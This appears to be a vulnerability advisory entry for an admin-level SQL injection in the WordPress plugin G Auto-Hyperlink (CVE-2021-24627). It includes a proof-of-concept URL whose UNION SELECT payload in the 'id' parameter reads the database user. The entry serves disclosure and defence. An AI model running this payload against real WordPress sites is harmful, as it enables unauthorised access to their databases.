WordPress Plugin Vulnerabilities

G Auto-Hyperlink <= 1.0.1 - Admin+ SQL Injection

Description

The plugin does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/g-auto-hyperlink/trunk/g-auto-hyperlink.php#L271

Open the follow URL as admin, which will output the current DB user: https://exxample.com/wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--

Affects Plugins

Plugin icon
g-auto-hyperlink
No known fix

References

CVE
CVE-2021-24627
URL
https://codevigilant.com/disclosure/2021/wp-plugin-g-auto-hyperlink/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
c04ea768-150f-41b8-b08c-78d1ae006bbb

Timeline

Publicly Published
2021-10-07 (about 2 years ago)
Added
2021-10-07 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2014-08-01
Title
WP Symposium < 12.12 - Multiple SQL Injections
Published
2015-07-19
Title
WR ContactForm <= 1.1.9 - Authenticated SQL Injection
Published
2024-04-26
Title
ProfileGrid < 5.7.2 - Authenticated (Contributor+) SQL Injection
Published
2011-10-06
Title
WP Postratings < 1.62 - Authenticated SQL Injection
Published
2022-10-03
Title
WP ALL Export Pro < 1.7.9 - Authenticated SQLi